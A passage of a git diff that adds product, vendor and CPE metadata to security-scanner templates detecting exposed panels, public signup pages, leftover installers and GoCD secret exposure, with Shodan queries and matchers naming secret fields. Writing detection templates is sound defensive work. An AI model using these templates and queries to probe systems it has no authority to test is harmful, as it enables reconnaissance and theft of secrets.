b/http/misconfiguration/git-web-interface.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: html:"git web interface version" + product: git + vendor: git-scm tags: git,misconfig + classification: + cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220403c31aafe58705c14121b826ac2d6a13d267dfbb5355ad61b8210fd16ffa186022100a2454f0fca7cfcde9de095c333f15e42d0a55bf9d93a8ee20a169302402d9422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220403c31aafe58705c14121b826ac2d6a13d267dfbb5355ad61b8210fd16ffa186022100a2454f0fca7cfcde9de095c333f15e42d0a55bf9d93a8ee20a169302402d9422:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/gitea-public-signup.yaml b/http/misconfiguration/gitea-public-signup.yaml index ed59fc04b1..2fa7a013bd 100644 --- a/http/misconfiguration/gitea-public-signup.yaml +++ b/http/misconfiguration/gitea-public-signup.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: html:"Powered by Gitea" + product: gitea + vendor: gitea tags: misconfig,gitea + classification: + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c36a1791582268e8b3a23df0696ff11d3112806c7c12c646b10ca49fe148f06f02206c39ee25b316e1041ed0c00c3381f1a9be432515ec5b2085dbd0649fb236d8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c36a1791582268e8b3a23df0696ff11d3112806c7c12c646b10ca49fe148f06f02206c39ee25b316e1041ed0c00c3381f1a9be432515ec5b2085dbd0649fb236d8ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/gitlab/gitlab-public-repos.yaml b/http/misconfiguration/gitlab/gitlab-public-repos.yaml index 85fd586193..1457c855c7 100644 --- a/http/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"GitLab" + product: gitlab + vendor: gitlab tags: gitlab,exposure,misconfig + classification: + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/gitlab/gitlab-public-signup.yaml b/http/misconfiguration/gitlab/gitlab-public-signup.yaml index 7eec6cf750..81072f95b4 100644 --- a/http/misconfiguration/gitlab/gitlab-public-signup.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-signup.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 2 shodan-query: http.title:"GitLab" + product: gitlab + vendor: gitlab tags: gitlab,misconfig + classification: + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: negative: true words: - '' -# digest: 4b0a00483046022100c7b6ba5ffe70452a7ec5263ab9276d0684c0ff800c028be0e74c5c8000852a90022100917c7b6b75a09d28467faef842e3236446f39d0908cd4818a3986ae4dd6d393e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7b6ba5ffe70452a7ec5263ab9276d0684c0ff800c028be0e74c5c8000852a90022100917c7b6b75a09d28467faef842e3236446f39d0908cd4818a3986ae4dd6d393e:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/gitlist-disclosure.yaml b/http/misconfiguration/gitlist-disclosure.yaml index c34df70852..f24c71a1a2 100644 --- a/http/misconfiguration/gitlist-disclosure.yaml +++ b/http/misconfiguration/gitlist-disclosure.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: title:"GitList" + product: gitlist + vendor: gitlist tags: gitlist,misconfig + classification: + cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c246a38f6aae9fe626cd123a9f8bb5360f0cb00262758d307b7d89bace70144e022100cd1fc6b9458ab883a169bb2e25a827ddade8be40c96b85c0285cc3e970d3727d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c246a38f6aae9fe626cd123a9f8bb5360f0cb00262758d307b7d89bace70144e022100cd1fc6b9458ab883a169bb2e25a827ddade8be40c96b85c0285cc3e970d3727d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml index 2d61ffc313..710507666f 100644 --- a/http/misconfiguration/global-traffic-statistics.yaml +++ b/http/misconfiguration/global-traffic-statistics.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Global Traffic Statistics" + product: big-ip_global_traffic_manager + vendor: f5 tags: misconfig,global,exposure + classification: + cpe: cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b775c84757259afdec43240a6f466e603c875bbc31415430559909a3f0c56e990220618c12727384029710c17534b61fad1cd778ea74c0df124e9e72b1993f7ce043:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b775c84757259afdec43240a6f466e603c875bbc31415430559909a3f0c56e990220618c12727384029710c17534b61fad1cd778ea74c0df124e9e72b1993f7ce043:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index d86c079492..e4f3b4ffaf 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -12,8 +12,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + product: gocd + vendor: thoughtworks tags: go,gocd,config,exposure,misconfig + classification: + cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - "webhookSecret" - "tokenGenerationKey" condition: and -# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index 928da55e05..75e0581ff4 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -12,8 +12,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + product: gocd + vendor: thoughtworks tags: go,gocd,exposure,misconfig + classification: + cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +42,4 @@ http: - type: regex regex: - "([a-z0-9]){32}" -# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 3759aa334e..60973648ae 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + product: gocd + vendor: thoughtworks tags: go,gocd,unauth,misconfig + classification: + cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/grafana-public-signup.yaml b/http/misconfiguration/grafana-public-signup.yaml index 69f9b9de6b..86ff9ab4bf 100644 --- a/http/misconfiguration/grafana-public-signup.yaml +++ b/http/misconfiguration/grafana-public-signup.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: title:"Grafana" + product: grafana + vendor: grafana tags: grafana,intrusive,misconfig + classification: + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* http: - raw: - | @@ -37,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cd9ddfa8c2baf843acc831480d26b30f6b6def4ceea41aa31c1d77cfc01ff8c40221009ca95c5f33cc23f93870f8fd3732b58e09571c68925449b31fcebdc136fb8e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd9ddfa8c2baf843acc831480d26b30f6b6def4ceea41aa31c1d77cfc01ff8c40221009ca95c5f33cc23f93870f8fd3732b58e09571c68925449b31fcebdc136fb8e32:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/graphql/graphql-alias-batching.yaml b/http/misconfiguration/graphql/graphql-alias-batching.yaml index ddfdbc2eb8..87515e3323 100644 --- a/http/misconfiguration/graphql/graphql-alias-batching.yaml +++ b/http/misconfiguration/graphql/graphql-alias-batching.yaml @@ -16,7 +16,11 @@ info: - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin metadata: max-request: 2 + product: playground + vendor: graphql tags: graphql,misconfig + classification: + cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:* variables: str: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/misconfiguration/graphql/graphql-playground.yaml b/http/misconfiguration/graphql/graphql-playground.yaml index 8025cd3ae2..8ae3d478b6 100644 --- a/http/misconfiguration/graphql/graphql-playground.yaml +++ b/http/misconfiguration/graphql/graphql-playground.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"GraphQL Playground" + product: playground + vendor: graphql tags: misconfig,graphql + classification: + cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml index 4da6743163..fb7974e4e8 100644 --- a/http/misconfiguration/grav-register-admin.yaml +++ b/http/misconfiguration/grav-register-admin.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Grav Register Admin User" + product: grav_admin + vendor: getgrav tags: grav,register,admin,misconfig + classification: + cpe: cpe:2.3:a:getgrav:grav_admin:*:*:*:*:grav:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml index a07874b0d9..5a38d58c2f 100644 --- a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml +++ b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml @@ -10,10 +10,13 @@ info: - https://huntr.com/bounties/e76372c2-39be-4984-a7c8-7048a75a25dc/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:h2o:h2o:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"H2O Flow" + product: h2o + vendor: h2o tags: h2o-3,h2o,info-leak,lfi,misconfig http: @@ -40,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022011339cdd427e09e0bb6fc6fea43c5ccc29862e53f5f7256276ebd3e7c8f6793902206a3f2c4d7f1e8cb7f4de5b3b851905eb9111a187a5298d84c25322a6162b485e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011339cdd427e09e0bb6fc6fea43c5ccc29862e53f5f7256276ebd3e7c8f6793902206a3f2c4d7f1e8cb7f4de5b3b851905eb9111a187a5298d84c25322a6162b485e:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/h2o/h2o-dashboard.yaml b/http/misconfiguration/h2o/h2o-dashboard.yaml index d991cdcedb..c9de98e6d9 100644 --- a/http/misconfiguration/h2o/h2o-dashboard.yaml +++ b/http/misconfiguration/h2o/h2o-dashboard.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"H2O Flow" + product: h2o + vendor: h2o tags: misconfig,exposure,h2o,ml,unauth + classification: + cpe: cpe:2.3:a:h2o:h2o:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 4afe76740e..0b6afce018 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"haproxy exporter" + product: haproxy + vendor: haproxy tags: haproxy,exposure,debug,misconfig + classification: + cpe: cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200655ee70596afce87e1d8db4b3082d84aa6b0da7a5861afb56a96f843e11fb20022069d40c4579c0ab2134a278af489c32581bcc20920ef60ada17b6749c1c838b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200655ee70596afce87e1d8db4b3082d84aa6b0da7a5861afb56a96f843e11fb20022069d40c4579c0ab2134a278af489c32581bcc20920ef60ada17b6749c1c838b3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/helm-dashboard-exposure.yaml b/http/misconfiguration/helm-dashboard-exposure.yaml index e13f1931d1..b1e1288d53 100644 --- a/http/misconfiguration/helm-dashboard-exposure.yaml +++ b/http/misconfiguration/helm-dashboard-exposure.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-594722214 + product: helm + vendor: helm tags: helm,exposure,dashboard,misconfig + classification: + cpe: cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200c928d3466fb2afc7ef3a518d29bf10ebf5fd16c91a849dacf733fe69d35f371022100c8c2066577de94aad09b500fcb4c77b506257299d6a97b8cda35db7983d14fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c928d3466fb2afc7ef3a518d29bf10ebf5fd16c91a849dacf733fe69d35f371022100c8c2066577de94aad09b500fcb4c77b506257299d6a97b8cda35db7983d14fe9:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/hfs-exposure.yaml b/http/misconfiguration/hfs-exposure.yaml index 22f404b720..5d656e450e 100644 --- a/http/misconfiguration/hfs-exposure.yaml +++ b/http/misconfiguration/hfs-exposure.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"HFS /" + product: http_file_server + vendor: rejetto tags: misconfig,hfs,exposure + classification: + cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/hp/unauthorized-printer-hp.yaml b/http/misconfiguration/hp/unauthorized-printer-hp.yaml index a6691957d8..2edb5cb765 100644 --- a/http/misconfiguration/hp/unauthorized-printer-hp.yaml +++ b/http/misconfiguration/hp/unauthorized-printer-hp.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 2 shodan-query: http.title:"Hp Officejet pro" + product: officejet_pro_8730_m9l80a + vendor: hp tags: hp,iot,unauth,misconfig + classification: + cpe: cpe:2.3:h:hp:officejet_pro_8730_m9l80a:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022036d37039d912ae59424a671dd9c349844585972c295d1f7acf85d745b211afb1022100976c9be00188085d703986b94ef6b8c11cf10ec28e9772b729eadded1dac8181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036d37039d912ae59424a671dd9c349844585972c295d1f7acf85d745b211afb1022100976c9be00188085d703986b94ef6b8c11cf10ec28e9772b729eadded1dac8181:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index 78edd832ee..a38e63f162 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 5 shodan-query: http.html:"IBM WebSphere Portal" + product: websphere_portal + vendor: ibm tags: ibm,exposure,websphere,misconfig + classification: + cpe: cpe:2.3:a:ibm:websphere_portal:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +49,4 @@ http: regex: - "Content-Location: .+" negative: true -# digest: 490a0046304402201c5eb880703621112635885e53f9cfafcbb265895a9e6e3e0566c4145a9219460220209f7384c05171450191229a29dea42cff94633d4cf821765179db3bed060082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c5eb880703621112635885e53f9cfafcbb265895a9e6e3e0566c4145a9219460220209f7384c05171450191229a29dea42cff94633d4cf821765179db3bed060082:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index ff5c51db33..6ada40b9ca 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -1,5 +1,5 @@ -id: imgproxy-unauth - +id: imgproxy-unauth + info: name: Imgproxy Unauthorized Access author: userdehghani @@ -12,24 +12,27 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"imgproxy" + product: imgproxy + vendor: evilmartians tags: imgproxy,unauth,misconfig -variables: - img_url: 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/375px-Google_2015_logo.svg.png' - -http: - - method: GET - path: - - "{{BaseURL}}/_/resize:fill:10:10:0/gravity:sm/plain/{{img_url}}" - - matchers: - - type: dsl - dsl: - - 'status_code==200' - - 'contains(content_type, "image/png")' - - '("386116288" == mmh3(base64_py(body)))' +variables: + img_url: 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/375px-Google_2015_logo.svg.png' + +http: + - method: GET + path: + - "{{BaseURL}}/_/resize:fill:10:10:0/gravity:sm/plain/{{img_url}}" + + matchers: + - type: dsl + dsl: + - 'status_code==200' + - 'contains(content_type, "image/png")' + - '("386116288" == mmh3(base64_py(body)))' condition: and -# digest: 4a0a004730450220704b225b4fa66229e20740798a9b41e07fe8dc7a66a7736b1e8a2c20ef5faae4022100fa98fdc074f11ca23a3cf61b816649a344000d34ee9e08490fca6f6969d1b0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220704b225b4fa66229e20740798a9b41e07fe8dc7a66a7736b1e8a2c20ef5faae4022100fa98fdc074f11ca23a3cf61b816649a344000d34ee9e08490fca6f6969d1b0f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml index e42398ec1b..ac397b505a 100644 --- a/http/misconfiguration/installer/activecollab-installer.yaml +++ b/http/misconfiguration/installer/activecollab-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"ActiveCollab Installer" + product: activecollab + vendor: activecollab tags: misconfig,install,exposure,activecollab + classification: + cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/adguard-installer.yaml b/http/misconfiguration/installer/adguard-installer.yaml index 5766ac0c07..c8cd375caf 100644 --- a/http/misconfiguration/installer/adguard-installer.yaml +++ b/http/misconfiguration/installer/adguard-installer.yaml @@ -10,8 +10,12 @@ info: max-request: 1 verified: true fofa-query: title="Setup AdGuard Home" + product: adguard + vendor: adguard tags: adguard,misconfig,install + classification: + cpe: cpe:2.3:a:adguard:adguard:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8a5710c842b60de55abc85e4049c343b837a0ada6f830040985caddfd526346022051d746f4754b723bce5d892a7a8f118ff7dde18894b91679a8e663ce25e79e8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8a5710c842b60de55abc85e4049c343b837a0ada6f830040985caddfd526346022051d746f4754b723bce5d892a7a8f118ff7dde18894b91679a8e663ce25e79e8b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/alma-installer.yaml b/http/misconfiguration/installer/alma-installer.yaml index e2d134ba86..cc7441efa2 100644 --- a/http/misconfiguration/installer/alma-installer.yaml +++ b/http/misconfiguration/installer/alma-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Alma Installation" + product: alma + vendor: almapay tags: misconfig,alma,install,exposure + classification: + cpe: cpe:2.3:a:almapay:alma:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/ampache-music-installer.yaml b/http/misconfiguration/installer/ampache-music-installer.yaml index 053575bdf0..19e379ee9c 100644 --- a/http/misconfiguration/installer/ampache-music-installer.yaml +++ b/http/misconfiguration/installer/ampache-music-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"For the Love of Music - Installation" + product: ampache + vendor: ampache tags: misconfig,ampache,install,exposure + classification: + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml index 81ffbcf92d..b4bfd9966b 100644 --- a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml +++ b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Bamboo setup wizard" + product: bamboo + vendor: atlassian tags: misconfig,atlassian,bamboo,setup,installer + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/avideo-install.yaml b/http/misconfiguration/installer/avideo-install.yaml index 9cbd284ecd..5361719e6f 100644 --- a/http/misconfiguration/installer/avideo-install.yaml +++ b/http/misconfiguration/installer/avideo-install.yaml @@ -9,11 +9,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L cvss-score: 8.2 cwe-id: CWE-459 + cpe: cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" + product: avideo + vendor: wwbn tags: panel,install,avideo,misconfig http: @@ -37,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6540411457d18242afa465a7b2ae500404d24cd51a1c8ccb353ca97c58aee24022100a88d1cf2a8087431f1b3761087fffff25c298d4ea251945ea74d1f4cc844685d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6540411457d18242afa465a7b2ae500404d24cd51a1c8ccb353ca97c58aee24022100a88d1cf2a8087431f1b3761087fffff25c298d4ea251945ea74d1f4cc844685d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/bagisto-installer.yaml b/http/misconfiguration/installer/bagisto-installer.yaml index fdba44d500..dcce31941f 100644 --- a/http/misconfiguration/installer/bagisto-installer.yaml +++ b/http/misconfiguration/installer/bagisto-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Bagisto Installer" + product: bagisto + vendor: webkul tags: misconfig,bagisto,install,exposure + classification: + cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b73e4ad96e1f51d647d1dbbe0cc021942038823d651e366a631627031caabc6022100e276eda2bd5d639c74569bf84080e9213406b99673a93d94883bc319ce400809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b73e4ad96e1f51d647d1dbbe0cc021942038823d651e366a631627031caabc6022100e276eda2bd5d639c74569bf84080e9213406b99673a93d94883bc319ce400809:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/bitrix24-installer.yaml b/http/misconfiguration/installer/bitrix24-installer.yaml index 2c3830eaa3..3e622c2dd5 100644 --- a/http/misconfiguration/installer/bitrix24-installer.yaml +++ b/http/misconfiguration/installer/bitrix24-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-2115208104 + product: bitrix24 + vendor: bitrix24 tags: misconfig,bitrix24,install,exposure + classification: + cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 